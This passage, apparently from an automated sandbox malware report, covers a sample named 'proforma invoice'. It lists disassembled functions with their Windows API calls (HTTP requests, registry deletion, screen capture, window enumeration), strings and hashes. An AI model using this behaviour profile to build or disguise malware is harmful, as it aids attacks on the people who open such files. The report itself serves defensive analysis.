                  • InternetCloseHandle.WININET(00000000), ref: 00B1C5FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                  • String ID:
                  • API String ID: 3800310941-3916222277
                  • Opcode ID: fa123d51ce03974958a3aaa61aaf0699a3cd684db2dedd6d9dbaa4b5ba9b23a6
                  • Instruction ID: bb39406c25a659e4cb6109f8dd77e7a99d9ef54157da8f8eb21655ff052abddd
                  • Opcode Fuzzy Hash: fa123d51ce03974958a3aaa61aaf0699a3cd684db2dedd6d9dbaa4b5ba9b23a6
                  • Instruction Fuzzy Hash: 775139B1540208BFEB218FA4C989ABB7FFDFB18754F504459F945E7210DB34EA889B60
                  Function 00B3856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00B38592
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B385A2
                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00B385AD
                  • CloseHandle.KERNEL32(00000000), ref: 00B385BA
                  • GlobalLock.KERNEL32(00000000), ref: 00B385C8
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B385D7
                  • GlobalUnlock.KERNEL32(00000000), ref: 00B385E0
                  • CloseHandle.KERNEL32(00000000), ref: 00B385E7
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00B385F8
                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B3FC38,?), ref: 00B38611
                  • GlobalFree.KERNEL32(00000000), ref: 00B38621
                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00B38641
                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00B38671
                  • DeleteObject.GDI32(00000000), ref: 00B38699
                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B386AF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                  • String ID:
                  • API String ID: 3840717409-0
                  • Opcode ID: c68392a251a38c15dbf543eb89628b8f55c34152a450a644f35f03847f7dd728
                  • Instruction ID: ff2bc5ff9811b92a73743e9ace7b5cd381af7941c91748e0732ce856c9241158
                  • Opcode Fuzzy Hash: c68392a251a38c15dbf543eb89628b8f55c34152a450a644f35f03847f7dd728
                  • Instruction Fuzzy Hash: A241F975600204BFDB119FA9DC89EAF7BB8FF89711F208059F905E7260DB30A901DB61
                  Function 00B114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(00000000), ref: 00B11502
                  • VariantCopy.OLEAUT32(?,?), ref: 00B1150B
                  • VariantClear.OLEAUT32(?), ref: 00B11517
                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B115FB
                  • VarR8FromDec.OLEAUT32(?,?), ref: 00B11657
                  • VariantInit.OLEAUT32(?), ref: 00B11708
                  • SysFreeString.OLEAUT32(?), ref: 00B1178C
                  • VariantClear.OLEAUT32(?), ref: 00B117D8
                  • VariantClear.OLEAUT32(?), ref: 00B117E7
                  • VariantInit.OLEAUT32(00000000), ref: 00B11823
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                  • API String ID: 1234038744-3931177956
                  • Opcode ID: da1abdb1166d8326a1d9dc87ea1a3cbe922bb5fff6b11114b28961f9f55103d5
                  • Instruction ID: 8c5ad28c79aa720c9b8e5e8031159b9e8b970bbc4ddd5b05b5e3f2ef64570fc9
                  • Opcode Fuzzy Hash: da1abdb1166d8326a1d9dc87ea1a3cbe922bb5fff6b11114b28961f9f55103d5
                  • Instruction Fuzzy Hash: 48D10071A00115DFDB009F69D884BBDB7F6FF45700FA48996E646AB281DB30DD80DB62
                  Function 00B2B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2B6F4
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2B772
                  • RegDeleteValueW.ADVAPI32(?,?), ref: 00B2B80A
                  • RegCloseKey.ADVAPI32(?), ref: 00B2B87E
                  • RegCloseKey.ADVAPI32(?), ref: 00B2B89C
                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B2B8F2
                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B2B904
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2B922
                  • FreeLibrary.KERNEL32(00000000), ref: 00B2B983
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B2B994
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                  • String ID: RegDeleteKeyExW$advapi32.dll
                  • API String ID: 146587525-4033151799
                  • Opcode ID: a1e3dbc281697352c7f7815844950c23b7becec3ff2eb0bbb8dda203b86d42db
                  • Instruction ID: 59cfa3b45b4b9e76861ac4a6208571a83fee23ef164489f19e29ef57220c9e2f
                  • Opcode Fuzzy Hash: a1e3dbc281697352c7f7815844950c23b7becec3ff2eb0bbb8dda203b86d42db
                  • Instruction Fuzzy Hash: 3CC1AD34208211AFD714DF14D495F2ABBE5FF85318F14859CF5AA8B2A2CB35EC45CB92
                  Function 00B2255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetDC.USER32(00000000), ref: 00B225D8
                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B225E8
                  • CreateCompatibleDC.GDI32(?), ref: 00B225F4
                  • SelectObject.GDI32(00000000,?), ref: 00B22601
                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B2266D
                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B226AC
                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B226D0
                  • SelectObject.GDI32(?,?), ref: 00B226D8
                  • DeleteObject.GDI32(?), ref: 00B226E1
                  • DeleteDC.GDI32(?), ref: 00B226E8
                  • ReleaseDC.USER32(00000000,?), ref: 00B226F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                  • String ID: (
                  • API String ID: 2598888154-3887548279
                  • Opcode ID: 37aa845260d5a38bc216b5b54c9d64d392c005ca968ba171152ae6384234a75f
                  • Instruction ID: 0468a31f6b0769d3ad4b7af101401ca0e79dae15469677c1a9765be8e8b82cfa
                  • Opcode Fuzzy Hash: 37aa845260d5a38bc216b5b54c9d64d392c005ca968ba171152ae6384234a75f
                  • Instruction Fuzzy Hash: 9E61E076D00219EFCF15CFA4D884AAEBBF6FF48310F208569E959A7250D770A941DFA0
                  Function 00ADDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 00ADDAA1
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD659
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD66B
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD67D
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD68F
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6A1
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6B3
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6C5
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6D7
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6E9
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6FB
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD70D
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD71F
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD731
                  • _free.LIBCMT ref: 00ADDA96
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00ADDAB8
                  • _free.LIBCMT ref: 00ADDACD
                  • _free.LIBCMT ref: 00ADDAD8
                  • _free.LIBCMT ref: 00ADDAFA
                  • _free.LIBCMT ref: 00ADDB0D
                  • _free.LIBCMT ref: 00ADDB1B
                  • _free.LIBCMT ref: 00ADDB26
                  • _free.LIBCMT ref: 00ADDB5E
                  • _free.LIBCMT ref: 00ADDB65
                  • _free.LIBCMT ref: 00ADDB82
                  • _free.LIBCMT ref: 00ADDB9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: 7d28868e338698166caf376ad6b48eaa2fa987d1074762d58f3180a8002ef85c
                  • Instruction ID: 4f7ea926a543a2a22f8b4991ce06f929a89b876ca3ef31f9d3908f1a7f405a2e
                  • Opcode Fuzzy Hash: 7d28868e338698166caf376ad6b48eaa2fa987d1074762d58f3180a8002ef85c
                  • Instruction Fuzzy Hash: 3A315A326046049FEB21AB38E945B6A7BE8FF50354F15841BE45ADB3A1DA30AC40DB20
                  Function 00B0365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetClassNameW.USER32(?,?,00000100), ref: 00B0369C
                  • _wcslen.LIBCMT ref: 00B036A7
                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B03797
                  • GetClassNameW.USER32(?,?,00000400), ref: 00B0380C
                  • GetDlgCtrlID.USER32(?), ref: 00B0385D
                  • GetWindowRect.USER32(?,?), ref: 00B03882
                  • GetParent.USER32(?), ref: 00B038A0
                  • ScreenToClient.USER32(00000000), ref: 00B038A7
                  • GetClassNameW.USER32(?,?,00000100), ref: 00B03921
                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B0395D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                  • String ID: %s%u
                  • API String ID: 4010501982-679674701
                  • Opcode ID: bb13e75ea2ecd9de6f3aa2dd08180aecc06a38c2e661d21e8bb538420651b2de
                  • Instruction ID: d87411b69691b57a733e6b8f332d6a792b65c927e41bb804f83287298f2b101b
                  • Opcode Fuzzy Hash: bb13e75ea2ecd9de6f3aa2dd08180aecc06a38c2e661d21e8bb538420651b2de
                  • Instruction Fuzzy Hash: 4E91AC71204706AFD718DF64C889FAABBECFF44750F108669F99A92190DB30EA45CB91
                  Function 00B04954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                  Download Yara Rule
                  APIs
                  • GetClassNameW.USER32(?,?,00000400), ref: 00B04994
                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B049DA
                  • _wcslen.LIBCMT ref: 00B049EB
                  • CharUpperBuffW.USER32(?,00000000), ref: 00B049F7
                  • _wcsstr.LIBVCRUNTIME ref: 00B04A2C
                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B04A64
                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B04A9D
                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B04AE6
                  • GetClassNameW.USER32(?,?,00000400), ref: 00B04B20
                  • GetWindowRect.USER32(?,?), ref: 00B04B8B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                  • String ID: ThumbnailClass
                  • API String ID: 1311036022-1241985126
                  • Opcode ID: 3cf442bf880fa8f2a27a266d47d91161cf3eb6176b01841d20cedd43aae2c0e4
                  • Instruction ID: 13bc76ba7465fb4f9f6cb2eed9a592567795b8f3cd96ee23bb977ab9810058b4
                  • Opcode Fuzzy Hash: 3cf442bf880fa8f2a27a266d47d91161cf3eb6176b01841d20cedd43aae2c0e4
                  • Instruction Fuzzy Hash: E7919AB21082059FDB14DF14C985BAA7BE8FF84314F0484A9FE859A1D6EB30ED45CBA1
                  Function 00B2CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B2CC64
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B2CC8D
                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B2CD48
                    • Part of subcall function 00B2CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B2CCAA
                    • Part of subcall function 00B2CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B2CCBD
                    • Part of subcall function 00B2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B2CCCF
                    • Part of subcall function 00B2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B2CD05
                    • Part of subcall function 00B2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B2CD28
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2CCF3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                  • String ID: RegDeleteKeyExW$advapi32.dll
                  • API String ID: 2734957052-4033151799
                  • Opcode ID: dbdb6772e94360bca0512b998d7fe2a87159f2a24b02cc5bc1937023009a40d5
                  • Instruction ID: 7838cb6903a5f924481f965fa6745113aac2bde0cab1f578c7bcdeff596d1f3a
                  • Opcode Fuzzy Hash: dbdb6772e94360bca0512b998d7fe2a87159f2a24b02cc5bc1937023009a40d5
                  • Instruction Fuzzy Hash: F5316075901129BBD7208BA5EC88EFFBFBCEF45750F1001A5A909E3150DB749E459BE0
                  Function 00B13D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                  Download Yara Rule
                  APIs
                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B13D40
                  • _wcslen.LIBCMT ref: 00B13D6D
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B13D9D
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B13DBE
                  • RemoveDirectoryW.KERNEL32(?), ref: 00B13DCE
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B13E55
                  • CloseHandle.KERNEL32(00000000), ref: 00B13E60
                  • CloseHandle.KERNEL32(00000000), ref: 00B13E6B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                  • String ID: :$\$\??\%s
                  • API String ID: 1149970189-3457252023
                  • Opcode ID: 2b97d266fe6d95150cec3dacb2ada46c742945d45a9bf67699e4f7fe94b0e251
                  • Instruction ID: 448a7ad0957a31ca58e857ff799f133353720dc30d789dc68e9d79f7aec84d91
                  • Opcode Fuzzy Hash: 2b97d266fe6d95150cec3dacb2ada46c742945d45a9bf67699e4f7fe94b0e251
                  • Instruction Fuzzy Hash: D8317272900219AADB219FA0DC89FEF37FCEF88B00F5041B5F505E61A0EB7497848B64
                  Function 00B0E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • timeGetTime.WINMM ref: 00B0E6B4
                    • Part of subcall function 00ABE551: timeGetTime.WINMM(?,?,00B0E6D4), ref: 00ABE555
                  • Sleep.KERNEL32(0000000A), ref: 00B0E6E1
                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00B0E705
                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B0E727
                  • SetActiveWindow.USER32 ref: 00B0E746
                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B0E754
                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B0E773
                  • Sleep.KERNEL32(000000FA), ref: 00B0E77E
                  • IsWindow.USER32 ref: 00B0E78A
                  • EndDialog.USER32(00000000), ref: 00B0E79B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                  • String ID: BUTTON
                  • API String ID: 1194449130-3405671355
                  • Opcode ID: 24b03a8f9b61b2a2876aa5b0f947e0779a1aaac1eb35363b9d15875d4bce698c
                  • Instruction ID: 134fef3bd5e57064a0d82d657ebb500ffa495942e30be31bd69149f261ee88fe
                  • Opcode Fuzzy Hash: 24b03a8f9b61b2a2876aa5b0f947e0779a1aaac1eb35363b9d15875d4bce698c
                  • Instruction Fuzzy Hash: 63215471200205AFEB116F64EC8AA293FA9F755749F241865F52AA31F1DF71DC409B24
                  Function 00B0E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B0EA5D
                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B0EA73
                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0EA84
                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B0EA96
                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B0EAA7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: SendString$_wcslen
                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                  • API String ID: 2420728520-1007645807
                  • Opcode ID: 7122108443f9f6c199f71323e5dbea2d301efdf5dfb55cc6216644563e9bae7c
                  • Instruction ID: 34f1d5f25e7704b4683ed99ae1c28e211296c9194f21ca2ebad29ca7d2c17a18
                  • Opcode Fuzzy Hash: 7122108443f9f6c199f71323e5dbea2d301efdf5dfb55cc6216644563e9bae7c
                  • Instruction Fuzzy Hash: A5115131A5021979D720A7A2DD4ADFF6BBCEBDAB40F0408A97811A70E1EFB04905C9B0
                  Function 00B05CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,00000001), ref: 00B05CE2
                  • GetWindowRect.USER32(00000000,?), ref: 00B05CFB
                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B05D59
                  • GetDlgItem.USER32(?,00000002), ref: 00B05D69
                  • GetWindowRect.USER32(00000000,?), ref: 00B05D7B
                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B05DCF
                  • GetDlgItem.USER32(?,000003E9), ref: 00B05DDD
                  • GetWindowRect.USER32(00000000,?), ref: 00B05DEF
                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B05E31
